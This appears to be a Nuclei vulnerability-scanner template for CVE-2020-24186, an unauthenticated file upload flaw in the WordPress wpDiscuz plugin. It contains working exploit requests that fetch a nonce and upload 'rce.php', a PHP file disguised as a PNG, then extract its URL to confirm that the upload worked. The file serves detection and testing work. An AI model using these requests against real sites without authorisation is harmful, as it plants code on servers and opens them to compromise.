94 lines
2.9 KiB
YAML
94 lines
2.9 KiB
YAML
id: CVE-2020-24186
|
|
|
|
info:
|
|
name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
|
|
author: Ganofins
|
|
severity: critical
|
|
description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
|
|
reference:
|
|
- https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24186
|
|
- https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
|
|
- http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2020-24186
|
|
cwe-id: CWE-434
|
|
epss-score: 0.97446
|
|
cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
framework: wordpress
|
|
vendor: gvectors
|
|
product: wpdiscuz
|
|
tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?p=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Origin: {{BaseURL}}
|
|
Referer: {{BaseURL}}
|
|
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
wmuUploadFiles
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_nonce"
|
|
|
|
{{wmuSecurity}}
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmuAttachmentsData"
|
|
|
|
undefined
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
|
|
Content-Type: image/png
|
|
|
|
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
|
|
<?php phpinfo();?>
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="postId"
|
|
|
|
1
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'success":true'
|
|
- 'fullname'
|
|
- 'shortname'
|
|
- 'url'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: wmuSecurity
|
|
group: 1
|
|
regex:
|
|
- 'wmuSecurity":"([a-z0-9]+)'
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
group: 1
|
|
regex:
|
|
- '"url":"([a-z:\\/0-9-.]+)"'
|
|
part: body
|